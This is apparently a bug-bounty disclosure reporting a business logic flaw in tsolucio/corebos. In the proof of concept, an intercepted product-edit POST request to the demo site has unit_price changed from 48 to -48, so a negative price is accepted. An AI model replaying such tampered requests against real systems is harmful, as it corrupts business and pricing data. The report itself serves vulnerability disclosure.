Business Logic Errors in tsolucio/corebos
Valid
Reported on
Dec 12th 2021
Description
The application is vulnerable to Business Logic error through negative product amount.
Proof of Concept
Step 1: Login into the application https://demo.corebos.com/index.php?action=Login&module=Users
Step 2: Navigate to Inventory -> Product -> Edit any product.
Step 3: Now enter an amount in Unit Price field and click on save, Now intercept the request over proxy.
Original Request
Host: demo.corebos.com
Cookie: democoreboscom=d3461f830c87c056a1a443f68e5a6350; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=868287147944918; ckCsrfToken=23swKt10CYryuff2VHVHjRn0LClD4DshAF6wcDZs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------205858748014217242463640623601
Content-Length: 8781
Referer: https://demo.corebos.com/index.php?module=Products&action=EditView&record=2616&return_module=Products&return_action=index&return_viewname=24
Origin: https://demo.corebos.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="__vt5rftk"
sid:e8fd5f35548bf20913d4768e75a115978d4be68a,1639332378
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3000000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="activity_mode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="pagenumber"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="record"
2616
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mode"
edit
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="action"
Save
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="saverepeat"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_id"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_action"
index
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_viewname"
24
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="createmode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo1"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo2"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Edit"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save_Param"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="FILTERFIELDSMAP"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="search_url"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productname"
K101high Pressure Japanese Stainless Steel Berring Tubo Tornado Gun
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="product_no"
PRO1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="discontinued"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcategory"
Hardware
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="manufacturer"
LexPon Inc.
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_start_date"
2014-03-04
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="start_date"
2013-05-07
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_end_date"
2025-07-13
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="expiry_date"
2025-04-27
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_type"
Vendors
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id"
2419
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_display"
John Drew Theater Of Gld Hall
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="website"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mfr_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productsheet"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="serial_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="glacct"
300-Sales-Software
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1184"
red, black,green
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_type"
test1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_display"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="unit_price"
48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_conversion_rate"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cur_1_check"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="curname1"
48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency_input"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="commissionrate"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax1"
4.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax2"
10.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax3"
12.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cost_price"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="usageunit"
Sheet
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qty_per_unit"
0.00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyinstock"
72.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="reorderlevel"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigntype"
U
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_user_id"
6
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_group_id"
3
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyindemand"
380
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1185"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="del_file_list"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="file_0"; filename=""
Content-Type: application/octet-stream
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="description"
Quis non odit sordidos, vanos, leves, futtiles? Dicet pro me ipsa virtus nec dubitabit isti vestro beato M. Stuprata per vim Lucretia a regis filio testata civis se ipsa interemit. Ea possunt paria non esse. Ut id aliis narrare gestiant? Duo Reges: constructio interrete. Idem fecisset Epicurus, si sententiam hanc, quae nunc Hieronymi est, coniunxisset cum Aristippi vetere sententia. Frater et T.
-----------------------------205858748014217242463640623601-- ```
Edited Request
```POST /index.php HTTP/2
Host: demo.corebos.com
Cookie: democoreboscom=d3461f830c87c056a1a443f68e5a6350; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=868287147944918; ckCsrfToken=23swKt10CYryuff2VHVHjRn0LClD4DshAF6wcDZs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------205858748014217242463640623601
Content-Length: 8781
Referer: https://demo.corebos.com/index.php?module=Products&action=EditView&record=2616&return_module=Products&return_action=index&return_viewname=24
Origin: https://demo.corebos.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="__vt5rftk"
sid:e8fd5f35548bf20913d4768e75a115978d4be68a,1639332378
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="MAX_FILE_SIZE"
3000000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="activity_mode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="pagenumber"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="record"
2616
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mode"
edit
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="action"
Save
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="saverepeat"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_module"
Products
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_id"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_action"
index
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="return_viewname"
24
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="createmode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo1"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cbcustominfo2"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Edit"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="Module_Popup_Save_Param"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="FILTERFIELDSMAP"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="search_url"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productname"
K101high Pressure Japanese Stainless Steel Berring Tubo Tornado Gun
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="product_no"
PRO1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="discontinued"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcode"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productcategory"
Hardware
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="manufacturer"
LexPon Inc.
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_start_date"
2014-03-04
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="start_date"
2013-05-07
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="sales_end_date"
2025-07-13
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="expiry_date"
2025-04-27
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_type"
Vendors
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id"
2419
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_id_display"
John Drew Theater Of Gld Hall
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="website"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="vendor_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="mfr_part_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="productsheet"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="serial_no"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="glacct"
300-Sales-Software
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1184"
red, black,green
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_type"
test1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="test1_relation_display"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="unit_price"
-48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_conversion_rate"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cur_1_check"
on
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="curname1"
-48
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="base_currency_input"
curname1
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="commissionrate"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax1"
4.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax2"
10.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="tax3"
12.500
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cost_price"
0,00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="usageunit"
Sheet
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qty_per_unit"
0.00
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyinstock"
72.000
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="reorderlevel"
0
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigntype"
U
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_user_id"
6
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="assigned_group_id"
3
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="qtyindemand"
380
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="cf_1185"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="del_file_list"
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="file_0"; filename=""
Content-Type: application/octet-stream
-----------------------------205858748014217242463640623601
Content-Disposition: form-data; name="description"
Quis non odit sordidos, vanos, leves, futtiles? Dicet pro me ipsa virtus nec dubitabit isti vestro beato M. Stuprata per vim Lucretia a regis filio testata civis se ipsa interemit. Ea possunt paria non esse. Ut id aliis narrare gestiant? Duo Reges: constructio interrete. Idem fecisset Epicurus, si sententiam hanc, quae nunc Hieronymi est, coniunxisset cum Aristippi vetere sententia. Frater et T.
-----------------------------205858748014217242463640623601--
```
Step 4: Once you submit the edited request to the server, the product is added with a negative amount.
We are processing your report and will contact the
tsolucio/corebos
team within 24 hours.
2 years ago
We have contacted a member of the
tsolucio/corebos
team and are waiting to hear back
2 years ago
Devendra Bhatla modified the report
2 years ago
We have sent a
follow up to the
tsolucio/corebos
team.
We will try again in 7 days.
2 years ago
Devendra Bhatla modified the report
2 years ago
to join this conversation